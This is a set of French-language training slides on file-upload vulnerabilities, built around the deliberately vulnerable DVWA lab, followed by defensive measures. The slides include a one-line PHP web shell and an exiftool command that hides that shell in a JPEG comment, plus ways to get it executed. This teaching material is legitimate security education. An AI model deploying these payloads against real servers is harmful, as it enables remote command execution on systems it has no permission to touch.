# upload
## aka chmod -R 777


### <i class="fas fa-cogs"></i> Upload de fichier

* Deux problèmes
  * filtrage des types de fichiers uploadés
  * exposition / exécution des scripts au niveau du répertoire d'upload

* Risque
  * Upload de code arbitraire
    * Backdoor ou Remote shell


### <i class="fas fa-cogs"></i> Upload de fichier

* Configurations liées à l'upload à différents endroits
  * HTML (côté client)
  * PHP (moteur de script)
  * Apache (serveur web)

* Ergonomiquement intéressant pour l'utilisateur
  * [elFinder](http://elfinder.org) ...
    * [et leurs problèmes de sécurité](https://github.com/Studio-42/elFinder/issues/815)

Note:
- MIME Multipurpose Internet Mail Extensions
  - pour que les clients mail puissent afficher correctement les PJ
- pas d'upload ... FTP, WebDav (utilise les verbs HTTP)


### <i class="fa-solid fa-bomb"></i> Upload / low

```
sudo chown -R www-data /var/www/DVWA/hackable/uploads
```

Upload d'un fichier bd.php simple

```php
<?php
echo passthru($_REQUEST['cmd']);
```

* Trouver le répertoire d'upload
  * chemins connus dans produits connus
  * code source HTML faisant référence au fichier uploadé

```
../../hackable/uploads/bd.php succesfully uploaded!
```


### <i class="fa-solid fa-bomb"></i> Upload / $_FILES

```
cd /var/www/DVWA/vulnerabilities/upload/
vi source/low.php
```

```php
print_r($_FILES);

Array ( 
    [uploaded] => Array ( 
        [name] => bd.php 
        [type] => application/x-php 
        [tmp_name] => /tmp/phpPU0gay 
        [error] => 0 
        [size] => 39 
    ) 
)
```


### <i class="fa-solid fa-bomb"></i> Upload / security medium

* contrôle de l'entête HTTP *Content-Type* renvoyé par le navigateur

![content-type](images/upload/content-type.png "content-type")


### <i class="fa-solid fa-bomb"></i> Upload / security high

![kitten](images/upload/kitten.jpg "kitten")<!-- .element style="width: 120px" -->

* visionner le "Comment" du jpg avec [exiftool](http://www.sno.phy.queensu.ca/~phil/exiftool/) + [<i class="fa fa-gift"></i>](http://www.gamergen.com/actualites/insolites-hacker-arrete-pour-poitrine-copine-93809-1)

* modifier le champs comment with exiftool

```
exiftool ~/Downloads/kitten.jpg \
  -comment="<?php echo passthru(\$_REQUEST['cmd']); __halt_compiler();?>"
```

Code uploadé :)


### <i class="fa-solid fa-bomb"></i> Upload / security high

code non exécuté :(

on doit passer par une autre vulnérabilité 

* [CMDi](cmdi.html) pour renommer `kitten.jpg` en `kitten.php`
* [LFI](fi.html) pour inclure la payload contenu dans `kitten.jpg`

ou `cp kitten.jpg kitten.php` ;)


### <i class="fa-solid fa-bomb"></i> Upload / autres contrôles

db.php

```php
echo passthru($_REQUEST['cmd'])
```

| <small>Command</small>                                                                        | <small>Output</small>             |   
| --------------------------------------------------------------------------------------------- |:---------------------------------:|
| <small>$_FILES['uploaded']['type']</small>                                                    | <small>application/x-php</small>  |   
| [<small>mime_content_type</small>](http://php.net/manual/fr/function.mime-content-type.php)   | <small>text/x-php</small>         |   
| [<small>exif_imagetype</small>](http://php.net/manual/fr/function.exif-imagetype.php)         | <small>null (no image)</small>    |
| [<small>finfo_file</small>](http://php.net/manual/fr/function.finfo-file.php)                 | <small>text/x-php</small>         |
| [<small>getimagesize[2]</small>](http://php.net/manual/fr/function.getimagesize.php)          | <small>null (no image)</small>    |
<!-- .element class="table-striped table-bordered table-hover" style="width: 100%" -->


### <i class="fa-solid fa-bomb"></i> Upload / autres contrôles

[![lego](images/upload/lego.jpeg "lego")<!-- .element style="width: 50px" -->](images/upload/lego.jpeg)
<small>[lego.jpeg](images/upload/lego.jpeg)</small>

| <small>Command</small>                                                                        | <small>Output</small>     |
| --------------------------------------------------------------------------------------------- |:-------------------------:|
| <small>$_FILES['uploaded']['type']</small>                                                    | <small>image/jpeg</small> |
| [<small>mime_content_type</small>](http://php.net/manual/fr/function.mime-content-type.php)   | <small>image/jpeg</small> |
| [<small>exif_imagetype</small>](http://php.net/manual/fr/function.exif-imagetype.php)         | <small>2 (IMAGETYPE_JPEG) |
| [<small>finfo_file</small>](http://php.net/manual/fr/function.finfo-file.php)                 | <small>image/jpeg         |
| [<small>getimagesize[2]</small>](http://php.net/manual/fr/function.getimagesize.php)          | <small>image/jpeg         |
<!-- .element class="table-striped table-bordered table-hover" style="width: 100%" -->


### <i class="fa-solid fa-bomb"></i> Upload / autres contrôles

![kitten](images/upload/kitten.jpg "kitten")<!-- .element style="width: 50px" -->
<small>[kitten.jpg.php](images/upload/kitten.jpg.php)</small>

| <small>Command</small>                                                                       | <small>Output</small>             |   
| -------------------------------------------------------------------------------------------- |:---------------------------------:|
| <small>$_FILES['uploaded']['type']</small>                                                   | <small>application/x-php</small>  |
| [<small>mime_content_type</small>](http://php.net/manual/fr/function.mime-content-type.php)  | <small>image/jpeg</small>         |
| [<small>exif_imagetype</small>](http://php.net/manual/fr/function.exif-imagetype.php)        | <small>2 (IMAGETYPE_JPEG)</small> |
| [<small>finfo_file</small>](http://php.net/manual/fr/function.finfo-file.php)                | <small>image/jpeg</small>         |
| [<small>getimagesize[2]</small>](http://php.net/manual/fr/function.getimagesize.php)         | <small>null (no image)</small>    |
<!-- .element class="table-striped table-bordered table-hover" style="width: 100%" -->

Note:
- le .php est indispensable pour exécuter la charge dans la commentaire de l'image
- parler d'exif -> cf le lien la géoloc (sur fb, etc ...)
- On pourrait également avoir une image malicieuse vouée à infecter le client
  - autre hisoitre
    - difficilement détectable à l'upload


## <i class="fa fa-medkit"></i> Se préserver

* Filtrer par extension de fichier plutôt que par type MIME
  * utiliser des listes blanches plutôt que des listes noires
  * un nom de fichier peut contenir des points
    * il faut bien prendre l'extension
  * c'est ce qui est fait avec [security high](http://dv.wa/vulnerabilities/upload/)


## <i class="fa fa-medkit"></i> Se préserver

désactiver php dans le répertoire d'upload

#### via le vhost ou .htaccess

```xml
php_admin_value engine Off
```

Note:
- MIME Multipurpose Internet Mail Extensions : pour que les clients mail puissent afficher correctement les PJ


## <i class="fa fa-medkit"></i> Se préserver

* Ne plus servir le répertoire d'upload via apache
  * sortir le répertoire d'upload du dossier servi par apache
  * en interdire la lecture avec un htaccess renvoyant une 403 Forbidden

#### via le vhost ou .htaccess

```
order deny, allow
deny from all
```


## <i class="fa fa-medkit"></i> Se préserver

* Utiliser PHP pour lire les fichier avec [readfile](http://php.net/manual/fr/function.readfile.php)
  * prendre en charge la génération des en-têtes **Content-Type** "manuellement"
    * [<i class="fab fa-github"></i> igorw/IgorwFileServeBundle](https://github.com/igorw/IgorwFileServeBundle)
    * [download center lite](http://www.stadtaus.com/fr/php_scripts/download_center_lite/)
      * permet une meilleure gestion des accès par permission
        * accès à la session courante
    

Note:
- attention toute la stack Sf2 à chaque image ou asset c'est chaud
